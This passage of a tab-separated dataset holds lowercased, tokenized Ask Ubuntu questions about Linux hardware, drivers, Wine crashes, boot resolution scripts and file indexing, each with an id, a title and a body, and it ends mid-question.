60121	support on hp pavillion g4-1004tx with intel-amd hybrid graphics	i 've got a laptop with sandy bridge + hybrid graphics and i want to use linux in it . i 've tried fedora 15 with no luck ( the radeon not detected but always on and runs with max performance , introducing heat problems ) . i 've tried the open source radeon driver , the proprietary driver , and in fedora , it just did n't work . everytime i installed a radeon driver , i ca n't boot anymore ( and have to uninstall it from terminal ) . the intel video only works with vesa mode , and i ca n't get a decent performance with it . even then , there 's still the heat problem that basically make the laptop unusable for more than 15 minutes . so now i 'm looking for another distro . does ubuntu support this configuration yet ? ( i do n't want to download another distro and find that it does n't works with my configuration . i 'm aware of this question , but it 's been three months . are there any improvement since ? i 've also search a solution a lot , but currently ca n't find anything . here 's the full specification of the laptop ( hp pavillion g4-1004tx ) : 2.3 ghz intel core i5-2410m 4 gb 1333 mhz ddr3 amd radeon hd 6470m ( 1 gb ddr3 ) / intel hd graphics 3000 ( shared memory ) 500 gb sata ( 5400 rpm ) lightscribe supermulti dvdâąr/rw with double layer support altec lansing speakers - srs premium sound broadcom 4313 802.11b/g/n bluetooth wifi ( hw id : pci\ven_14e4 & dev_4727 & subsys_1483103c & rev_01 ) integrated 10/100 base-t ethernet lan update : i 've confirmed that it did n't work . it did n't even show the splash screen ( the ubuntu loading screen ) after boot . setting nomodeset and acpi=off while booting shows the splash screen , which eventually gives error message basically like this : bad lun ... bad target ... and finally , i confirmed it did n't work and find the same problem here . maybe the next release will fix this .
60123	why ca n't ubuntu 11.04 see my usb flash drive ?	i have a sandisk cruzer micro 4gb flash drive and ubuntu does n't see it . windows 7 can see it so i think this is a problem with ubuntu . how can i fix it ? sudo fdisk -l gave : disk /dev/sda : 320.1 gb , 320071851520 bytes 255 heads , 63 sectors/track , 38913 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000a2b52 device boot start end blocks id system /dev/sda1 * 1 13 102400 7 hpfs/ntfs partition 1 does not end on cylinder boundary . /dev/sda2 13 22494 180573914 7 hpfs/ntfs partition 2 does not end on cylinder boundary . /dev/sda3 22494 38914 131892225 5 extended partition 3 does not end on cylinder boundary . /dev/sda5 22494 38392 127699968 83 linux /dev/sda6 38392 38914 4191232 82 linux swap / solaris disk /dev/sdb : 4022 mb , 4022337024 bytes 255 heads , 63 sectors/track , 489 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 * 1 490 3927936 6 fat16 partition 1 has different physical/logical endings : phys= ( 488 , 254 , 63 ) logical= ( 489 , 3 , 26 ) mount gave : /dev/sda5 on / type ext4 ( rw , errors=remount-ro , user_xattr , commit=0 ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) none on /sys type sysfs ( rw , noexec , nosuid , nodev ) fusectl on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /dev type devtmpfs ( rw , mode=0755 ) none on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) none on /dev/shm type tmpfs ( rw , nosuid , nodev ) none on /var/run type tmpfs ( rw , nosuid , mode=0755 ) none on /var/lock type tmpfs ( rw , noexec , nosuid , nodev ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) /dev/sda1 on /media/system reserved type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) gvfs-fuse-daemon on /home/eitan706/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=eitan706 ) /dev/sda2 on /media/62689a296899fbcb type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) /dev/sdb1 on /media/pendrive type vfat ( rw , nosuid , nodev , uhelper=udisks , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush )
60125	using external vpn resources from inside virtualbox	i 'm using networkmanager to connect to work via openvpn . it works nicely , but virtualbox guests ( connected to the host with nat ) ca n't resolve work-related hostnames . the openvpn server pushes a `` dhcp-option dns '' to the client , so the host can resolve those hostnames , but it looks like the guest can not ... is this expected ? am i missing something ? ( both host and guest are xubuntu lucid )
60129	why is the latest version of miro not in the repositories ?	what 's the reason that the available version of `` miro '' is only 3.5.1 in ubuntu 11.10 ? the latest version of miro is 4.0.3 , and there is still a ppa available with the latest version . but why is n't miro available in the official repository ?
60130	problem while installing ubuntu 11.04 alternate ( aptitude failed )	while i 'm installing ubuntu from alternate iso i have a problem with aptitude installation of certain packages . the syslog shows this : sep 5 17:15:17 in-target : paquetes rotos sep 5 17:15:17 in-target : sep 5 17:15:17 in-target : tasksel : aptitude fallăâł ( 100 ) sep 5 17:15:17 main-menu [ 337 ] : warning ** : configuring 'pkgsel ' failed with error code 1 sep 5 17:15:17 main-menu [ 337 ] : warning ** : menu item 'pkgsel ' failed . sep 5 17:15:20 main-menu [ 337 ] : info : modifying debconf priority limit from 'high ' to 'medium' sep 5 17:15:20 debconf : setting debconf/priority to medium sep 5 17:15:20 main-menu [ 337 ] : debug : resolver ( libnewt0.52 ) : package does n't exist ( ignored ) sep 5 17:15:20 main-menu [ 337 ] : debug : resolver ( ext2-modules ) : package does n't exist ( ignored ) sep 5 17:15:20 main-menu [ 337 ] : debug : resolver ( efi-modules ) : package does n't exist ( ignored ) sep 5 17:15:29 main-menu [ 337 ] : info : menu item 'save-logs ' selected sep 5 17:15:38 main-menu [ 337 ] : debug : resolver ( libnewt0.52 ) : package does n't exist ( ignored ) sep 5 17:15:38 main-menu [ 337 ] : debug : resolver ( ext2-modules ) : package does n't exist ( ignored ) sep 5 17:15:38 main-menu [ 337 ] : debug : resolver ( efi-modules ) : package does n't exist ( ignored ) note : i have 226mb of ram
60133	where can i find chromium binary tarballs ?	firefox 's website provides binary tarballs that i can easily extract and run , is there anything similar available for either chrome or chromium ? if not , how can i compile so i can run it the same way as the extracted files of binary tarball ?
60142	ca n't install bodog poker client	i cant seem to be able to run the bodogpoker client at all on kubuntu 11.04x64 . i get no errors during installation but get the following message when trying to run the software . winehq says their should be no problems installing this program , but a slight workaround when the program is first run . any help any one can provide would be very much appreciated . thank you . edit : wine version 1.2.3 i 'm not exactly sure what version of the poker client it is but i got it directly from the offical bodog website and here is the link : http : //poker.bodog.eu/how-to-play/download-poker.html this is what i get when trying to run wine bodog through the terminal : trace output : sanish @ kedge14 : ~ $ wine `` c : \program files\bodog poker\bpgame.exe '' wine : call from 0x7b839f22 to unimplemented function msvcp80.dll. ? ? 0 ? $ basic_string @ gu ? $ char_traits @ g @ std @ @ v ? $ allocator @ g @ 2 @ @ std @ @ qae @ pbg @ z , aborting wine : unimplemented function msvcp80.dll. ? ? 0 ? $ basic_string @ gu ? $ char_traits @ g @ std @ @ v ? $ allocator @ g @ 2 @ @ std @ @ qae @ pbg @ z called at address 0x7b839f22 ( thread 0009 ) , starting debugger ... unhandled exception : unimplemented function msvcp80.dll. ? ? 0 ? $ basic_string @ gu ? $ char_traits @ g @ std @ @ v ? $ allocator @ g @ 2 @ @ std @ @ qae @ pbg @ z called in 32-bit code ( 0x7b839f22 ) . register dump : cs:0023 ss:002b ds:002b es:002b fs:0063 gs:006b eip:7b839f22 esp:0032fd0c ebp:0032fd70 eflags:00200287 ( - -- i s - -p-c ) eax:7b825ef1 ebx:7b893ff4 ecx:7e13a523 edx:0032fd34 esi:80000100 edi:00762418 stack dump : 0x0032fd0c : 0032fd90 00000008 0075f480 80000100 0x0032fd1c : 00000001 00000000 7b839f22 00000002 0x0032fd2c : 7e133ff4 7e13a523 00762418 0032fd48 0x0032fd3c : 7bc65b1b 7e0c7ff4 0076395c 0032fd68 0x0032fd4c : 7e2db971 0002e81f 00847634 0076395c 0x0032fd5c : 7e270ff4 7e2db960 7b839eda 7e270ff4 backtrace : = > 0 0x7b839f22 in kernel32 ( +0x29f22 ) ( 0x0032fd70 ) 1 0x7e133f98 in msvcp80 ( +0x23f97 ) ( 0x0032fda0 ) 2 0x7e11fd5d in msvcp80 ( +0xfd5c ) ( 0x0032fe08 ) 3 0x0075e670 in bpgame ( +0x35e66f ) ( 0x0032fe08 ) 4 0x00474486 in bpgame ( +0x74485 ) ( 0x0032fe90 ) 5 0x7b8598bc call_process_entry+0xb ( ) in kernel32 ( 0x0032fea8 ) 6 0x7b85a95f in kernel32 ( +0x4a95e ) ( 0x0032fee8 ) 7 0x7bc72158 call_thread_func+0xb ( ) in ntdll ( 0x0032fef8 ) 8 0x7bc758ee in ntdll ( +0x658ed ) ( 0x0032ffc8 ) 9 0x7bc49c9e call_dll_entry_point+0x61d ( ) in ntdll ( 0x0032ffe8 ) 0x7b839f22 : subl $ 4 , % esp modules : module address debug info name ( 133 modules ) pe 330000- 36e000 deferred ssleay32 pe 370000- 3d1000 deferred bptune pe 3e0000- 3fe000 deferred bpemfloader pe 400000- 86e000 export bpgame pe 870000- 8a3000 deferred bpbase pe 8b0000- 8c4000 deferred bpurl pe 8d0000- 8e0000 deferred bptime pe 8e0000- 8e7000 deferred bptranslated pe 8f0000- 8fc000 deferred bpplayer pe 900000- 908000 deferred bphumaninput pe 910000- 928000 deferred bpmenu pe 930000- 93a000 deferred bpsite pe 940000- 97b000 deferred bpresource pe 980000- a16000 deferred fmod pe 1160000- 1172000 deferred bptranslatedcore pe 10000000-1011e000 deferred libeay32 pe 5d360000-5d36e000 deferred mfc80enu pe 781d0000-782df000 deferred mfc80 elf 7b800000-7b9a8000 dwarf kernel32 < elf > \-pe 7b810000-7b9a8000 \ kernel32 elf 7bc00000-7bcc3000 dwarf ntdll < elf > \-pe 7bc10000-7bcc3000 \ ntdll elf 7bf00000-7bf04000 deferred < wine-loader > elf 7d50c000-7d515000 deferred librt.so.1 elf 7d515000-7d552000 deferred libdbus-1.so.3 elf 7d552000-7d557000 deferred libgpg-error.so.0 elf 7d557000-7d568000 deferred libtasn1.so.3 elf 7d568000-7d56c000 deferred libkeyutils.so.1 elf 7d56c000-7d57c000 deferred libavahi-client.so.3 elf 7d57c000-7d5f0000 deferred libgcrypt.so.11 elf 7d5f0000-7d686000 deferred libgnutls.so.26 elf 7d686000-7d6aa000 deferred libk5crypto.so.3 elf 7d6aa000-7d758000 deferred libkrb5.so.3 elf 7d758000-7d788000 deferred libgssapi_krb5.so.2 elf 7d788000-7d7d2000 deferred libcups.so.2 elf 7d969000-7d99d000 deferred uxtheme < elf > \-pe 7d970000-7d99d000 \ uxtheme elf 7d99d000-7d9a3000 deferred libxfixes.so.3 elf 7d9a3000-7d9ad000 deferred libxcursor.so.1 elf 7d9ad000-7d9bc000 deferred libxi.so.6 elf 7d9bc000-7d9c0000 deferred libxcomposite.so.1 elf 7d9c0000-7d9c8000 deferred libxrandr.so.2 elf 7d9c8000-7d9d2000 deferred libxrender.so.1 elf 7d9d2000-7d9d8000 deferred libxxf86vm.so.1 elf 7d9d8000-7d9dc000 deferred libxinerama.so.1 elf 7d9dc000-7d9fe000 deferred imm32 < elf > \-pe 7d9e0000-7d9fe000 \ imm32 elf 7d9fe000-7da04000 deferred libxdmcp.so.6 elf 7da04000-7da08000 deferred libxau.so.6 elf 7da08000-7da21000 deferred libxcb.so.1 elf 7da21000-7da26000 deferred libuuid.so.1 elf 7da26000-7db41000 deferred libx11.so.6 elf 7db41000-7db50000 deferred libxext.so.6 elf 7db50000-7db68000 deferred libice.so.6 elf 7db68000-7db70000 deferred libsm.so.6 elf 7db70000-7db78000 deferred libkrb5support.so.0 elf 7db78000-7db84000 deferred libavahi-common.so.3 elf 7db8e000-7db92000 deferred libcom_err.so.2 elf 7db94000-7dc3b000 deferred winex11 < elf > \-pe 7dba0000-7dc3b000 \ winex11 elf 7dd5d000-7dd87000 deferred libexpat.so.1 elf 7dd87000-7ddb6000 deferred libfontconfig.so.1 elf 7ddb6000-7de3c000 deferred libfreetype.so.6 elf 7de3c000-7de51000 deferred libresolv.so.2 elf 7de75000-7de97000 deferred iphlpapi < elf > \-pe 7de80000-7de97000 \ iphlpapi elf 7de97000-7dec0000 deferred msvfw32 < elf > \-pe 7dea0000-7dec0000 \ msvfw32 elf 7dec0000-7df01000 deferred avifil32 < elf > \-pe 7ded0000-7df01000 \ avifil32 elf 7df01000-7df3a000 deferred winspool < elf > \-pe 7df10000-7df3a000 \ winspool elf 7df3a000-7e02e000 deferred comdlg32 < elf > \-pe 7df40000-7e02e000 \ comdlg32 elf 7e02e000-7e105000 deferred msvcp90 < elf > \-pe 7e050000-7e105000 \ msvcp90 elf 7e105000-7e1b6000 dwarf msvcp80 < elf > \-pe 7e110000-7e1b6000 \ msvcp80 elf 7e1b6000-7e1ed000 deferred libncurses.so.5 elf 7e1ed000-7e27a000 deferred msvcrt < elf > \-pe 7e200000-7e27a000 \ msvcrt elf 7e2c3000-7e2f2000 deferred msvcr90 < elf > \-pe 7e2d0000-7e2f2000 \ msvcr90 elf 7e2f2000-7e31d000 deferred msvcr80 < elf > \-pe 7e300000-7e31d000 \ msvcr80 elf 7e31d000-7e34f000 deferred ws2_32 < elf > \-pe 7e320000-7e34f000 \ ws2_32 elf 7e34f000-7e441000 deferred oleaut32 < elf > \-pe 7e370000-7e441000 \ oleaut32 elf 7e441000-7e4b5000 deferred gdiplus < elf > \-pe 7e450000-7e4b5000 \ gdiplus elf 7e4b5000-7e4da000 deferred mpr < elf > \-pe 7e4c0000-7e4da000 \ mpr elf 7e4da000-7e4ef000 deferred libz.so.1 elf 7e4f8000-7e513000 deferred wsock32 < elf > \-pe 7e500000-7e513000 \ wsock32 elf 7e513000-7e57e000 deferred wininet < elf > \-pe 7e520000-7e57e000 \ wininet elf 7e57e000-7e673000 deferred comctl32 < elf > \-pe 7e590000-7e673000 \ comctl32 elf 7e673000-7e6dc000 deferred shlwapi < elf > \-pe 7e680000-7e6dc000 \ shlwapi elf 7e6dc000-7e8ec000 deferred shell32 < elf > \-pe 7e6f0000-7e8ec000 \ shell32 elf 7e8ec000-7e900000 deferred msimg32 < elf > \-pe 7e8f0000-7e900000 \ msimg32 elf 7e900000-7e929000 deferred msacm32 < elf > \-pe 7e910000-7e929000 \ msacm32 elf 7e929000-7e99e000 deferred rpcrt4 < elf > \-pe 7e930000-7e99e000 \ rpcrt4 elf 7e99e000-7eaa4000 deferred ole32 < elf > \-pe 7e9b0000-7eaa4000 \ ole32 elf 7eaa4000-7eb04000 deferred advapi32 < elf > \-pe 7eab0000-7eb04000 \ advapi32 elf 7eb04000-7eba9000 deferred gdi32 < elf > \-pe 7eb10000-7eba9000 \ gdi32 elf 7eba9000-7ece6000 deferred user32 < elf > \-pe 7ebc0000-7ece6000 \ user32 elf 7ece6000-7ed88000 deferred winmm < elf > \-pe 7ecf0000-7ed88000 \ winmm elf 7ef88000-7ef94000 deferred libnss_files.so.2 elf 7ef94000-7ef9f000 deferred libnss_nis.so.2 elf 7ef9f000-7efb6000 deferred libnsl.so.1 elf 7efb6000-7efdc000 deferred libm.so.6 elf 7efe7000-7f000000 deferred version < elf > \-pe 7eff0000-7f000000 \ version elf f7458000-f745c000 deferred libdl.so.2 elf f745c000-f75b9000 deferred libc.so.6 elf f75b9000-f75d2000 deferred libpthread.so.0 elf f75d8000-f75e0000 deferred libnss_compat.so.2 elf f75f6000-f7737000 dwarf libwine.so.1 elf f7739000-f7757000 deferred ld-linux.so.2 elf f7757000-f7758000 deferred [ vdso ] .so threads : process tid prio ( all id : s are in hex ) 00000008 ( d ) c : \program files\bodog poker\bpgame.exe 00000009 0 < == 0000000e services.exe 0000001c 0 00000016 0 00000015 0 00000014 0 00000010 0 0000000f 0 00000011 winedevice.exe 00000018 0 00000017 0 00000013 0 00000012 0 00000019 plugplay.exe 0000001d 0 0000001b 0 0000001a 0 0000001e explorer.exe 0000001f 0 backtrace : = > 0 0x7b839f22 in kernel32 ( +0x29f22 ) ( 0x0032fd70 ) 1 0x7e133f98 in msvcp80 ( +0x23f97 ) ( 0x0032fda0 ) 2 0x7e11fd5d in msvcp80 ( +0xfd5c ) ( 0x0032fe08 ) 3 0x0075e670 in bpgame ( +0x35e66f ) ( 0x0032fe08 ) 4 0x00474486 in bpgame ( +0x74485 ) ( 0x0032fe90 ) 5 0x7b8598bc call_process_entry+0xb ( ) in kernel32 ( 0x0032fea8 ) 6 0x7b85a95f in kernel32 ( +0x4a95e ) ( 0x0032fee8 ) 7 0x7bc72158 call_thread_func+0xb ( ) in ntdll ( 0x0032fef8 ) 8 0x7bc758ee in ntdll ( +0x658ed ) ( 0x0032ffc8 ) 9 0x7bc49c9e call_dll_entry_point+0x61d ( ) in ntdll ( 0x0032ffe8 ) wine : call from 0x7b839f22 to unimplemented function msvcp80.dll. ? ? 0 ? $ basic_string @ gu ? $ char_traits @ g @ std @ @ v ? $ allocator @ g @ 2 @ @ std @ @ qae @ pbg @ z , aborting
60144	why is wireless to wireless transfer so slow ?	i have two wifi connected computers via a wifi modem/router to share my internet connection . this setup works fine to access the internet but i am not able to effectively transfer files between these two computers . the maximum speed is around 300 kb/s and it fluctuates a lot ( generally going downwards ) . sometimes the download even stalls . is there something wrong with my wifi drivers ? all my wireless devices are capable of 54 mbps connectivity . i do n't see anything near it while transferring data over my wifi router to the other computer . has anybody else seen better performance ?
60146	do i have to check `` enable bookmark sync '' on both machines running 11.04 ?	if i want to sync firefox bookmarks only one direction , do i have to check `` enable bookmark sync '' on both machines ? both are running 11.04 and firefox 6.01 . how about both directions ?
60152	how do i do a raw write to a cd with dd ?	how do i do a raw write to my cd drive /dev/scd0 ? i want to write a bootloader ( that takes two sectors ) directly onto a cd , is this possible ?
60155	does 32-bit pae with more than 4gb ram improve speed ?	i would like to buy a thinkpad t420 with 8gb ram configuration and install specifically 32-bit ubuntu desktop with pae as i heard that 64-bit version has some issues such as providing support for applications based on flash . theoretically more ram gives better speed , but practically there could be some issues such as consuming more power etc . therefore , i am not sure whether i can get improved speed if i use ubuntu 32-bit pae with 8gb ram instead of 32-bit pae with 4gb ram or not , specifically for watching streamed movies , playing videos , video encoding etc . therefore , i am in dilemma whether to buy t420 with upgarded 8gb ram or not ?
60156	segmentation fault when running unity	i 've just installed ubuntu , and i 'm trying to get unity working . when i start the computer , ubuntu loads the classic mode , even though unity is enabled in compizconfig settings manager . my video card supports unity , since i could use it perfectly well when i was using wubi . if i go to the terminal and type unity , i get the following output : unity-panel-service : no process found backend : gconf integration : true profile : unity adding plugins initializing core options ... done window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 1 initializing bailer options ... done initializing detection options ... done initializing composite options ... done segmentation fault all of the windows open flash briefly , and titlebars disappear , as described here . i have searched the net for literally hours now , and i 've come across other people who have had the same problem , but i have not yet been able to resolve it .
60161	change the default downloads directory	i originally had a downloads folder , but decided to create a separate partition for it . so i renamed downloads to downloads2 . i know , i should have just cut and pasted the content , but this seemed easier . anyway : for some reason downloads2 was now the default downloads directory . it even got the ubuntu download icon ( the arrow alone ) but no matter what i do now : downloads2 is still the default download directory . even changing its name does nothing this time around . how is that possible ? and how do i change it ?
60176	how can i fix a `` disk not ready error '' when booting from usb ?	i installed ubuntu and everything went ok . i did it by looking at this guide http : //www.linuxbsdos.com/2011/05/23/install-ubuntu-11-04-on-external-hard-disk/ then when it boots from usb i get this error at the begining while booting disk drive for boot is not ready yet or not present according to this guide method 1 i went to grub/grub.cfg ( since in grub 2 its no more menu.lst ) and changed all /dev/sdc to /dev/sda as the guy says in his guide , but after these changes it still gives me the same error message . can anyone help with this issue ?
60177	how do i fix a file sharing error ?	i have two computers running ubuntu 11.04 . i am able to to see them on the network but when i try to open the shared files i get the message , unable to mount location dbus error org.freedesktop.dbus.error.noreply message did not receive a reply ( timeout by message bus ) . how do i fix this please ? i have only been using linux for a few days . this is not a dual boot system . it runs ubuntu 11.04 only .
60180	which has better compatability , nvidia or intel graphics ?	i would like to buy a thinkpad t420 and install ubuntu . thinkpad t420 comes with an option of choosing between nvidia nvs 4200m graphics with optimus technology , 1gb ddr3 memory and intel hd graphics 3000 . which one is better compatibility with ubuntu . please let me know .
60188	how to remotely lock out users from logging in temporarily	i 'm not sure how to word this . i would like to be able to , remotely , lock down my kids ' access either for an amount of time , or have lock/unlock control . basically , i want to lock out an account temporarily until i unlock it remotely .
60192	after fixing boot resolution ( due to nvidia driver install ) login resolution is lower	these are the steps i made : install ubuntu 11.04 update the system install nvidia driver i fixed the grub and plymouth resolution issue then a problem appeared : the login screen resolution is lower than optimal ( native is 1280x800 but the problem is when resolution seems to be 1024x768 ) , it did not happen before i tried to fix the resolution problem . the script i used to fix the resolution is the following : # ! /bin/bash # usage : install_if_not_installed package_name function install_if_not_installed { package= '' $ 1 '' installed= $ ( dpkg -l `` $ package '' > /dev/null 2 > & 1 & & echo ok || echo ko ) if [ `` $ installed '' == `` ko '' ] then sudo apt-get install `` $ package '' -y fi } # usage : contains regexp file function contains { regexp= '' $ 1 '' file= '' $ 2 '' grep `` $ regexp '' `` $ file '' > /dev/null & & echo ok || echo ko } install_if_not_installed v86d install_if_not_installed hwinfo sudo hwinfo -- framebuffer echo `` -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - '' echo `` please enter the best resolution from the list above '' echo `` it usualy looks like this > > mode 0x0323 : 1024x768 ( +4096 ) , 24 bits < < `` echo `` and you have to enter it like this > > 1024x768-24 < < `` echo `` -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - '' read resolution sed 's/grub\_cmdline\_linux\_default\=\ '' quiet\ splash\ '' /grub\_cmdline\_linux\_default\=\ '' quiet\ splash\ nomodeset\ video\=uvesafb\ : mode\_option\= ' $ resolution'\ , mtrr\=3\ , scroll\=ywrap\ '' /g ' /etc/default/grub > ./newgrub sudo mv -f ./newgrub /etc/default/grub sed 's/grub\_cmdline\_linux\_default\=\ '' quiet\ splash\ '' /grub\_cmdline\_linux\_default\=\ '' quiet\ splash\ nomodeset\ video\=uvesafb\ : mode\_option\= ' $ resolution'\ , mtrr\=3\ , scroll\=ywrap\ '' /g ' /etc/default/burg > ./newburg sudo mv -f ./newburg /etc/default/burg sed 's/\ # grub\_gfxmode\=640x480/grub\_gfxmode\= ' $ resolution'/g ' /etc/default/grub > ./newgrub sudo mv -f ./newgrub /etc/default/grub if [ `` $ ( contains uvesafb /etc/initramfs-tools/modules ) '' == 'ko ' ] then sudo echo `` uvesafb mode_option= $ resolution mtrr=3 scroll=ywrap '' | sudo tee -a /etc/initramfs-tools/modules fi if [ `` $ ( contains framebuffer=y /etc/initramfs-tools/conf.d/splash ) '' == 'ko ' ] then echo framebuffer=y | sudo tee /etc/initramfs-tools/conf.d/splash fi sed 's/grub\_cmdline\_linux\_default\=\ '' \ $ grub\_cmdline\_linux\_default vt\.handoff\=7\ '' /grub\_cmdline\_linux\_default\=\ '' \ $ grub\_cmdline\_linux\_default\ '' /g ' /etc/grub.d/10_linux > ./new10linux sudo mv -f ./new10linux /etc/grub.d/10_linux sudo chmod +x /etc/grub.d/10_linux sudo update-grub2 which update-burg > /dev/null 2 > & 1 & & sudo update-burg sudo update-initramfs -u echo `` the resolution should be fixed after a reboot '' update : it is confirmed that it is due to nvidia driver not loading correctly upon first login ( logging out fixes the problem aswell as service gdm restart ) this is the log : [ 20.115 ] ( ee ) nvidia : failed to load the nvidia kernel module . please check your [ 20.115 ] ( ee ) nvidia : system 's kernel log for additional error messages . [ 20.115 ] ( ii ) unloadmodule : `` nvidia '' [ 20.115 ] ( ii ) unloading nvidia [ 20.115 ] ( ee ) failed to load module `` nvidia '' ( module-specific error , 0 ) thanks in advance ( and sorry if it was posted before )
60193	looking for open-source fashion design software	i do n't know anything about fashion design , but i 've been getting into streetwear and want to try and make some t-shirt and hat designs . now , i can obviously design in inkscape , but i was wondering if there was any specific fashion design software available for ubuntu .
60200	how to copy data between different instances of vim ?	if i use the first vim to copy a line ( with yy ) , how do i paste to another terminal 's vim ( with p ) ? is there any command or settings can do it ? can i copy and paste into the global system clipboard ? i know the following ways are possible , but i want a simpler one : i do not want to exit the first vim and reopen the second vim . i do not want to use separate window ( with : sp ) .
60202	updatedb & locate command problem - files from external hard drive are no longer indexed after rebooting	files from my external hard drive are no longer indexed after rebooting . i have to remount and then run # updatedb after each reboot . the problem is updatedb takes a few minutes for my external hard drives . is there any way i can retain indexing for my externals after i reboot so that the locate command can search through my externals ? edit : per request here are my specs : $ cat /etc/updatedb.conf prune_bind_mounts= '' yes '' # prunenames= '' .git .bzr .hg .svn '' prunepaths= '' /tmp /var/spool /media '' prunefs= '' nfs nfs nfs4 rpc_pipefs afs binfmt_misc proc smbfs autofs iso9660 ncpfs coda devpts ftpfs devfs mfs shfs sysfs cifs lustre_lite tmpfs usbfs udf fuse.glusterfs fuse.sshfs ecryptfs fusesmb devtmpfs '' # mount /dev/sda5 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) none on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /dev type devtmpfs ( rw , mode=0755 ) none on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) none on /dev/shm type tmpfs ( rw , nosuid , nodev ) none on /var/run type tmpfs ( rw , nosuid , mode=0755 ) none on /var/lock type tmpfs ( rw , noexec , nosuid , nodev ) none on /lib/init/rw type tmpfs ( rw , nosuid , mode=0755 ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/me/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=me ) /dev/sdb1 on /media/me type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) /dev/sdd1 on /media/little boy type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) /dev/sde1 on /media/fat man type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) # on_ac_power ; echo $ ? 255
60208	have desktop load first after login before loading the indicators	this is weird . my laptop which is newer and faster by over twice as much than my desktop , and 64-bit nonetheless vs 32-bit , seems to boot slow compared to the latter . what is even more weird is that the laptop appears to load the de slower because it attempts to ready everything in one go . as a result , after logging in , it is stuck for how many seconds with just the gdm background ( the default ubuntu wallpaper ) before it loads the desktop . imagine a kde splash screen after login without the splash ! not very pretty . i know having a lot of indicators can be one main cause , but i almost have the same indicators on my laptop and desktop , the latter just ahead by one more indicator . i 'm not saying desktop is faster on this ( loading the de ) but the impression is faster because the difference is that after logging in on the desktop it will very shortly load unity interface then load the indicators one by one . the progress can be seen on 